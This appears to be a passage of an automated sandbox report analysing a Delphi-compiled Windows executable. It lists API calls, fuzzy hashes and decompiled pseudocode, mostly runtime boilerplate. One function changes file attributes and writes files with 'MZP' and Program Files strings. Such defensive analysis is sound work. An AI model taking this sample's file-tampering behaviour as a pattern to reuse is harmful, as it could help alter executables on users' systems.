                                                                                                                          0x00406304
                                                                                                                          0x0040630c
                                                                                                                          0x0040630d
                                                                                                                          0x00406310
                                                                                                                          0x00406313
                                                                                                                          0x00406320
                                                                                                                          0x00406325
                                                                                                                          0x0040632e
                                                                                                                          0x00406333
                                                                                                                          0x0040633e
                                                                                                                          0x00406344
                                                                                                                          0x0040635b
                                                                                                                          0x00406378
                                                                                                                          0x0040637d
                                                                                                                          0x00406458
                                                                                                                          0x0040645b
                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x004062e1
                                                                                                                          0x0040646b
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406222
                                                                                                                          0x00406224
                                                                                                                          0x00406225
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00000000
                                                                                                                          0x0040622f
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040623c
                                                                                                                          0x0040623f
                                                                                                                          0x00406242
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406248
                                                                                                                          0x00406254
                                                                                                                          0x00406259
                                                                                                                          0x0040625a
                                                                                                                          0x0040625c
                                                                                                                          0x00000000
                                                                                                                          0x00406235
                                                                                                                          0x00406236
                                                                                                                          0x0040647f
                                                                                                                          0x00406481
                                                                                                                          0x00406484
                                                                                                                          0x00000000
                                                                                                                          0x00406484
                                                                                                                          0x00406489
                                                                                                                          0x00406489
                                                                                                                          0x00406233
                                                                                                                          0x0040622d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FCB0, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004100D0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                                                                          • CopyImage.USER32 ref: 0041040F
                                                                                                                          • CopyImage.USER32 ref: 00410496
                                                                                                                          • CopyImage.USER32 ref: 004101EA
                                                                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                                                                            • Part of subcall function 0040FBEC: 73BBA7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                                                                          • CopyImage.USER32 ref: 0041052B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00410C68, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040C9B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}





                                                                                                                          0x00402f20
                                                                                                                          0x00402f80
                                                                                                                          0x00402f90
                                                                                                                          0x00402f90
                                                                                                                          0x00402f96
                                                                                                                          0x00402f22
                                                                                                                          0x00402f2b
                                                                                                                          0x00402f3b
                                                                                                                          0x00402f3b
                                                                                                                          0x00402f57
                                                                                                                          0x00402f78
                                                                                                                          0x00402f78

                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040184C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x63f8a0
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x640eb4
					while(_t19 != 0x40a5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x6408a0
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x6408a0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}










                                                                                                                          0x0040184d
                                                                                                                          0x00401857
                                                                                                                          0x0040192b
                                                                                                                          0x0040185d
                                                                                                                          0x0040185f
                                                                                                                          0x00401860
                                                                                                                          0x00401865
                                                                                                                          0x00401868
                                                                                                                          0x00401872
                                                                                                                          0x00401874
                                                                                                                          0x00401879
                                                                                                                          0x00401879
                                                                                                                          0x0040187e
                                                                                                                          0x00401885
                                                                                                                          0x0040188b
                                                                                                                          0x00401892
                                                                                                                          0x00401897
                                                                                                                          0x004018b1
                                                                                                                          0x004018aa
                                                                                                                          0x004018af
                                                                                                                          0x004018af
                                                                                                                          0x004018be
                                                                                                                          0x004018c8
                                                                                                                          0x004018d2
                                                                                                                          0x004018d7
                                                                                                                          0x004018de
                                                                                                                          0x004018e2
                                                                                                                          0x004018e9
                                                                                                                          0x004018ee
                                                                                                                          0x004018f3
                                                                                                                          0x004018f9
                                                                                                                          0x004018fc
                                                                                                                          0x004018ff
                                                                                                                          0x0040190b
                                                                                                                          0x0040190d
                                                                                                                          0x00401912
                                                                                                                          0x00401912
                                                                                                                          0x00401917
                                                                                                                          0x0040191c
                                                                                                                          0x00401921
                                                                                                                          0x00401921

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                                                                          • LocalFree.KERNEL32(0063F8A0,00000000,00401922), ref: 0040188B
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0063F8A0,00000000,00401922), ref: 004018AA
                                                                                                                          • LocalFree.KERNEL32(006408A0,?,00000000,00008000,0063F8A0,00000000,00401922), ref: 004018E9
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 00401912
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040191C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040B2E4, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                                                                          • LocalFree.KERNEL32(0063F8A0,00000000,00401922), ref: 0040B323
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0063F8A0,00000000,00401922), ref: 0040B342
                                                                                                                          • LocalFree.KERNEL32(006408A0,?,00000000,00008000,0063F8A0,00000000,00401922), ref: 0040B381
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040B3AA
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040B3B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403D7D, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}





                                                                                                                          0x00403d7d
                                                                                                                          0x00403d82
                                                                                                                          0x00403d87
                                                                                                                          0x00403d89
                                                                                                                          0x00403d90
                                                                                                                          0x00403d9a
                                                                                                                          0x00403da4
                                                                                                                          0x00403dab
                                                                                                                          0x00403dbc
                                                                                                                          0x00403dbe
                                                                                                                          0x00403dbe
                                                                                                                          0x00403dc3
                                                                                                                          0x00403dc8
                                                                                                                          0x00403dd1
                                                                                                                          0x00403dda
                                                                                                                          0x00403de8
                                                                                                                          0x00403df2
                                                                                                                          0x00403e06
                                                                                                                          0x00403e3f
                                                                                                                          0x00403e08
                                                                                                                          0x00403e16
                                                                                                                          0x00403e2e
                                                                                                                          0x00403e18
                                                                                                                          0x00403e18
                                                                                                                          0x00403e18
                                                                                                                          0x00403e16
                                                                                                                          0x00403e44
                                                                                                                          0x00403e49
                                                                                                                          0x00403e4e

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 0040280D
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 00402819
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734044017-0
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 65%
                                                                                                                          			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                          0x00402839
                                                                                                                          0x0040283b
                                                                                                                          0x00402845
                                                                                                                          0x00402861
                                                                                                                          0x004028b0
                                                                                                                          0x004028c2
                                                                                                                          0x004028c5
                                                                                                                          0x004028ce
                                                                                                                          0x00402863
                                                                                                                          0x00402865
                                                                                                                          0x00402866
                                                                                                                          0x0040286b
                                                                                                                          0x0040286e
                                                                                                                          0x00402871
                                                                                                                          0x0040288d
                                                                                                                          0x00402894
                                                                                                                          0x00402897
                                                                                                                          0x0040289a
                                                                                                                          0x004028a8
                                                                                                                          0x004028a8

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040C2D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
